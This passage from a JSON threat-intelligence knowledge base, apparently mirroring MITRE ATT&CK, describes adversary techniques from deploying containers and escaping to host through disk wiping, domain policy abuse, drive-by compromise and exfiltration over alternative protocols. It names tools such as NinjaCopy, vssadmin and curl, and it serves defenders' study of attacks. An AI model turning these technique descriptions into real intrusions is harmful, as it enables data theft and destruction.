"description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://app.tidalcyber.com/technique/bebaf25b-9f50-4e3b-96cc-cc55c5765b61) and access other containers running on the node. <sup>[[AppSecco Kubernetes Namespace Breakout 2020](https://app.tidalcyber.com/references/85852b3e-f6a3-5406-9dd5-a649358a53de)]</sup>\n\nContainers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow. <sup>[[Docker Containers API](https://app.tidalcyber.com/references/2351cb32-23d6-4557-9c52-e6e228402bab)]</sup><sup>[[Kubernetes Dashboard](https://app.tidalcyber.com/references/02f23351-df83-4aae-a0bd-614ed91bc683)]</sup><sup>[[Kubeflow Pipelines](https://app.tidalcyber.com/references/0b40474c-173c-4a8c-8cc7-bac2dcfcaedd)]</sup> In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.<sup>[[Kubernetes Workload Management](https://app.tidalcyber.com/references/f207163b-08a8-5219-aca8-812e83e0dad3)]</sup> Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup>",
"meta": {
"platforms": [
"Containers"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "2618638c-f6bd-4840-a297-c45076e094a9",
"value": "Deploy Container"
},
{
"description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)]</sup><sup>[[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]</sup>\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "bf660248-2098-499b-b90c-8c47efb26c70",
"value": "Develop Capabilities"
},
{
"description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)).\n\nMany OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.<sup>[[Microsoft Driverquery](https://app.tidalcyber.com/references/7302dc00-a75a-5787-a04c-88ef4922ac09)]</sup><sup>[[Microsoft EnumDeviceDrivers](https://app.tidalcyber.com/references/647ffc70-8eab-5f2f-abf4-9bbf42554043)]</sup> Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055)) may also be available in the Registry.<sup>[[Microsoft Registry Drivers](https://app.tidalcyber.com/references/4bde767e-d4a7-56c5-9aa3-b3f3cc2e3e70)]</sup>\n\nOn Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.<sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup><sup>[[lsmod man](https://app.tidalcyber.com/references/c2f88274-9da4-5d24-b68d-302ee5990dd5)]</sup><sup>[[modinfo man](https://app.tidalcyber.com/references/d4f2db5c-ef6d-556d-a5e2-f6738277fecd)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "70ffc700-eb9b-54d7-8fd4-564bd71a6434",
"value": "Device Driver Discovery"
},
{
"description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. <sup>[[Hakobyan 2009](https://app.tidalcyber.com/references/d92f6dc0-e902-4a4a-9083-8d1667a7003e)]</sup>\n\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.<sup>[[Github PowerSploit Ninjacopy](https://app.tidalcyber.com/references/e92aed6b-348b-4dab-8292-fee0698e4a85)]</sup> Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa)) to create shadow copies or backups of data from system volumes.<sup>[[LOLBAS Esentutl](https://app.tidalcyber.com/references/691b4907-3544-4ad0-989c-b5c845e0330f)]</sup>",
"meta": {
"platforms": [
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "447f1d32-31f7-44b5-834a-dcba8b038e7f",
"value": "Direct Volume Access"
},
{
"description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `erase`.<sup>[[erase_cmd_cisco](https://app.tidalcyber.com/references/4c90eba9-118e-5d50-ad58-27bcb0e1e228)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "ea2b3980-05fd-41a3-8ab9-3106e833c821",
"value": "Disk Wipe"
},
{
"description": "Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.\n\nModifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.\n\nWith sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential malicious outcomes that can stem from this abuse. Examples of such abuse include: \n\n* modifying GPOs to push a malicious [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82) to computers throughout the domain environment<sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup><sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup>\n* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to forge access tokens that will subsequently be accepted by victim domain resources<sup>[[Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks](https://app.tidalcyber.com/references/47031992-841f-4ef4-87c6-bb4c077fb8dc)]</sup>\n* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://app.tidalcyber.com/technique/c5eb5b88-6c62-4900-9b14-c4d67d420002).\n* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant <sup>[[Okta Cross-Tenant Impersonation 2023](https://app.tidalcyber.com/references/d54188b5-86eb-52a0-8384-823c45431762)]</sup>\n\nAdversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.",
"meta": {
"platforms": [
"Azure AD",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "d092a9e1-63d0-415d-8cd0-666a261be5d9",
"value": "Domain or Tenant Policy Modification"
},
{
"description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.<sup>[[Microsoft Trusts](https://app.tidalcyber.com/references/e6bfc6a8-9eea-4c65-9c2b-04749da72a92)]</sup> Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5), [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a), and [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be).<sup>[[AdSecurity Forging Trust Tickets](https://app.tidalcyber.com/references/09d3ccc1-cd8a-4675-88c0-84110f5b8e8b)]</sup><sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.<sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> The Windows utility [Nltest](https://app.tidalcyber.com/software/fbb1546a-f288-4e43-9e5c-14c94423c4f6) is known to be used by adversaries to enumerate domain trusts.<sup>[[Microsoft Operation Wilysupply](https://app.tidalcyber.com/references/567ce633-a061-460b-84af-01dfe3d818c7)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "93bd112e-9494-4b60-bdc5-8b610c7ebe21",
"value": "Domain Trust Discovery"
},
{
"description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).\n\nMultiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)), including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to as a strategic web compromise or watering hole attack. There are several known examples of this occurring.<sup>[[Shadowserver Strategic Web Compromise](https://app.tidalcyber.com/references/cf531866-ac3c-4078-b847-5b4af7eb161f)]</sup>\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.<sup>[[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381",
"value": "Drive-by Compromise"
},
{
"description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server, malware may employ dynamic resolution as a means of reestablishing command and control.<sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup><sup>[[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "987ad3da-9423-4fe0-a52b-b931c0b8b95f",
"value": "Dynamic Resolution"
},
{
"description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "3569b783-1be5-414b-adb9-42c47ceee1cc",
"value": "Email Collection"
},
{
"description": "Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "0e704680-c930-42a7-9caa-5802b8cb2c48",
"value": "Encrypted Channel"
},
{
"description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.<sup>[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]</sup>\n\nIn cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.<sup>[[ArsTechnica Great Firewall of China](https://app.tidalcyber.com/references/1a08d58f-bf91-4345-aa4e-2906d3ef365a)]</sup>\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).\n",
            "meta": {
                "platforms": [
                    "Azure AD",
                    "Containers",
                    "Google Workspace",
                    "IaaS",
                    "Linux",
                    "macOS",
                    "Office 365",
                    "SaaS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
                    "type": "uses"
                }
            ],
            "uuid": "8b0caea0-602e-4117-8322-b125150f5c2a",
            "value": "Endpoint Denial of Service"
        },
        {
            "description": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.<sup>[[Docker Overview](https://app.tidalcyber.com/references/52954bb1-16b0-4717-a72c-8a6dec97610b)]</sup>\n\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.<sup>[[Docker Bind Mounts](https://app.tidalcyber.com/references/b298b3d1-30c1-4894-b1de-be11812cde6b)]</sup><sup>[[Trend Micro Privileged Container](https://app.tidalcyber.com/references/92ac290c-4863-4774-b334-848ed72e3627)]</sup><sup>[[Intezer Doki July 20](https://app.tidalcyber.com/references/688b2582-6602-44e1-aaac-3a4b8e168b04)]</sup><sup>[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup><sup>[[Crowdstrike Kubernetes Container Escape](https://app.tidalcyber.com/references/84d5f015-9014-417c-b2a9-f650fe19d448)]</sup><sup>[[Keyctl-unmask](https://app.tidalcyber.com/references/75db8c88-e547-4d1b-8f22-6ace2b3d7ad4)]</sup>\n\nAdditionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://app.tidalcyber.com/technique/0b9609dd-9f19-4747-ba6e-421b6b7ff03f).<sup>[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup> Adversaries may also escape via [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.<sup>[[Windows Server Containers Are Open](https://app.tidalcyber.com/references/9a801256-5852-433e-95bd-768f9b70b9fe)]</sup>\n\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.",
            "meta": {
                "platforms": [
                    "Containers",
                    "Linux",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
                    "type": "uses"
                }
            ],
            "uuid": "bebaf25b-9f50-4e3b-96cc-cc55c5765b61",
            "value": "Escape to Host"
        },
        {
            "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make it seem real. This could include filling out profile information, developing social networks, or incorporating photos.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup> In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) for malicious purposes.<sup>[[Free Trial PurpleUrchin](https://app.tidalcyber.com/references/841f397d-d103-56d7-9854-7ce43c684879)]</sup>\n",
            "meta": {
                "platforms": [
                    "PRE"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
                    "type": "uses"
                }
            ],
            "uuid": "9a2d6628-0dd7-4f25-a242-b752fcf47ff4",
            "value": "Establish Accounts"
        },
        {
"description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup><sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>\n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.<sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup><sup>[[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)]</sup><sup>[[amnesia malware](https://app.tidalcyber.com/references/489a6c57-f64c-423b-a7bd-169fa36c4cdf)]</sup>\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ",
            "meta": {
                "platforms": [
                    "IaaS",
                    "Linux",
                    "macOS",
                    "Office 365",
                    "SaaS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
                    "type": "uses"
                },
                {
                    "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
                    "type": "uses"
                }
            ],
            "uuid": "e1e42979-d3cd-461b-afc4-a6373cbf97ba",
            "value": "Event Triggered Execution"
        },
        {
            "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary-supplied and environment-specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduce collateral damage from an adversary’s campaign.<sup>[[FireEye Kevin Mandia Guardrails](https://app.tidalcyber.com/references/0c518eec-a94e-42a7-8eb7-527ae3e279b6)]</sup> Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.<sup>[[FireEye Outlook Dec 2019](https://app.tidalcyber.com/references/f23a773f-9c50-4193-877d-97f7c13f48f1)]</sup>\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "aca9cbac-5c11-4050-8d9c-2a947c89a1e8",
            "value": "Execution Guardrails"
        },
        {
"description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88) can be done using various common operating system utilities such as [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc)/SMB or FTP.<sup>[[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)]</sup> On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5).",
            "meta": {
                "platforms": [
                    "Google Workspace",
                    "IaaS",
                    "Linux",
                    "macOS",
                    "Network",
                    "Office 365",
                    "SaaS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
                    "type": "uses"
                }
            ],
            "uuid": "192d25ea-bae1-48e4-88de-e0acd481ab88",
            "value": "Exfiltration Over Alternative Protocol"
        },
        {
